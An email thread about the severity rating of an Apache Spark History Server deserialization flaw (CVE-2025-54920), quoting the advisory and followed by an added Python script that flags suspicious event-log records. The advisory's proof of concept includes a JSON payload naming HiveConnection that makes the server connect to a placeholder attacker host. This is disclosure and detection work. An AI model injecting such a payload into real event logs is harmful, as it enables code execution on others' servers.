Hi Tres,

It was initially reported as high but I updated it to low after looking at how difficult it was to trigger (existing user required relatively high permissions), but looks like there was an additional field to update. I’ll take a look and see what I can do to update that.
Cheers,

Holden

Twitter: https://twitter.com/holdenkarau
Fight Health Insurance: https://www.fighthealthinsurance.com/
Books (Learning Spark, High Performance Spark, etc.): https://amzn.to/2MaRAG9
YouTube Live Streams: https://www.youtube.com/user/holdenkarau
Pronouns: she/her

On Wed, Mar 18, 2026 at 6:12 AM Tres Pittman <[email protected]> wrote:

> Hi Holden
>
> Why does your email say severity is Low?
>
> According to GitHub and other sources, severity is actually High
>
> Best,
> Tres
>
> Sent from Proton Mail for iOS.
>
> -------- Original Message --------
> On Friday, 03/13/26 at 16:14 Holden Karau <[email protected]> wrote:
>
> Severity: low
>
> Affected versions:
>
> - Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) before 3.5.7
> - Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1
>
> Description:
>
> This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.
>
> Summary
>
> Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.
>
> Details
>
> The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.
>
> The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
>
> Proof of Concept:
>
> 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).
>
> 2. Inject the following JSON at the beginning of an event log file:
>
> {
>   "Event": "org.apache.hive.jdbc.HiveConnection",
>   "uri": "jdbc:hive2://<IP>:<PORT>/",
>   "info": {
>     "hive.metastore.uris": "thrift://<IP>:<PORT>"
>   }
> }
>
> 3. Start the Spark History Server with logs pointing to the modified directory.
>
> 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.
>
> Impact
>
> An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
>
> This issue is being tracked as SPARK-52381
>
> Credit:
>
> Alexandre Pujol (Linagora) (finder)
>
> References:
>
> https://github.com/apache/spark/pull/51312
> https://github.com/apache/spark/pull/51323
> https://issues.apache.org/jira/browse/SPARK-52381
> https://spark.apache.org/
> https://www.cve.org/CVERecord?id=CVE-2025-54920
>
> ---------------------------------------------------------------------
> To unsubscribe e-mail: [email protected]
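An added example, not code from the advisory or the Spark project: a triage script a History Server operator could run over the files in spark.eventLog.dir to spot records whose "Event" type is not a Spark listener event, which is what the injection described in the quoted advisory looks like on disk. It assumes Spark's JSON-lines event-log format, reuses the advisory's org.apache.hive.jdbc.HiveConnection record (placeholders kept) as a constructed sample, and treats the short "SparkListener..." names plus classes under org.apache.spark. as the expected set, which is a heuristic rather than Spark's own check.

```python
"""Added example, not from the advisory or Spark: flag event-log records
whose "Event" type is not a Spark listener event. Spark's built-in events use
a short "SparkListener..." name or a class under org.apache.spark.; anything
else in that field deserves review (heuristic: add site-specific custom
listener event classes to EXPECTED_PREFIXES)."""
import json

EXPECTED_PREFIXES = ("SparkListener", "org.apache.spark.")

def suspicious_events(lines):
    """Return (line_no, event_type, reason) per record to review.
    Lines must already be decompressed if spark.eventLog.compress is on."""
    findings = []
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            findings.append((no, None, "not valid JSON"))
            continue
        evt = rec.get("Event") if isinstance(rec, dict) else None
        if not isinstance(evt, str):
            findings.append((no, None, "missing or non-string Event field"))
        elif not evt.startswith(EXPECTED_PREFIXES):
            findings.append((no, evt, "Event names a non-Spark class"))
    return findings


def scan_file(path):
    """Run suspicious_events over one uncompressed event-log file."""
    with open(path, encoding="utf-8") as fh:
        return suspicious_events(fh)


# Constructed sample: a normal record, the injected record from the advisory
# (placeholders kept), a legitimate fully-qualified SQL event, a corrupt line.
SAMPLE_LOG = [
    '{"Event":"SparkListenerLogStart","Spark Version":"3.5.4"}',
    '{"Event":"org.apache.hive.jdbc.HiveConnection","uri":"jdbc:hive2://<IP>:<PORT>/",'
    '"info":{"hive.metastore.uris":"thrift://<IP>:<PORT>"}}',
    '{"Event":"org.apache.spark.sql.execution.ui.SparkListenerSQLExecutionStart","executionId":0}',
    'not json at all',
]

if __name__ == "__main__":
    for no, evt, reason in suspicious_events(SAMPLE_LOG):
        print(f"line {no}: {reason}" + (f" ({evt})" if evt else ""))
```

Run scan_file on each file in the event-log directory; a hit is a reason to inspect who has write access to that directory, which the advisory identifies as the precondition for the attack.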
